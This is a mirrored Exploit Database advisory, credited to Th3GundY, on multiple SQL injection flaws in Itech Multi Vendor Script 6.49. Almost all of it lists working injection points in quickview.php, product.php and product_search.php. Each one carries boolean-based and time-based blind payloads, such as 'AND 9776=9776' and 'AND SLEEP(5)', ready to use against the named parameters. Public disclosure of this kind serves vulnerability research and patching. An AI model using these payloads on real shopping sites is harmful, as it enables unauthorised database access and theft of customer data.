Itech Multi Vendor Script 6.49 – SQL Injection

• Exploit Database
• 124 阅读

• 作者： Th3GundY
  日期： 2017-02-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41238/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78

  # Exploit Title :Itech Multi Vendor Script - Multiple SQL Injections # Author :Yunus YILDIRIM (Th3GundY) # Team :CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com # Website :http://www.yunus.ninja # Contact :yunusyildirim@protonmail.com   # Vendor Homepage : http://itechscripts.com/ # Software Link : http://itechscripts.com/multi-vendor-shopping-script/ # Vuln. Version : 6.49 # Demo : http://multi-vendor.itechscripts.com     # # # #DETAILS# # # #   SQL Injections :   # 1 http://localhost/quickview.php?id=10 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=10 AND 9776=9776   Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=10 AND SLEEP(5)   # 2 http://localhost/product.php?id=9 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=9 AND 9693=9693   Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=9 AND SLEEP(5)   # 3 http://localhost/product_search.php?search=Adidas Parameter: search (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: search=Adidas%' AND SLEEP(5) AND '%'='   # 4 http://localhost/product_search.php?category_id=1 Parameter: category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category_id=1 AND 8225=8225   Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: category_id=1 AND SLEEP(5)   # 5 http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1 Parameter: sub_sub_category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485   Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)   # 6 http://localhost/product_search.php?category_id=1&sub_category_id=1 Parameter: sub_category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category_id=1&sub_category_id=1 AND 5242=5242   Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: category_id=1&sub_category_id=1 AND SLEEP(5)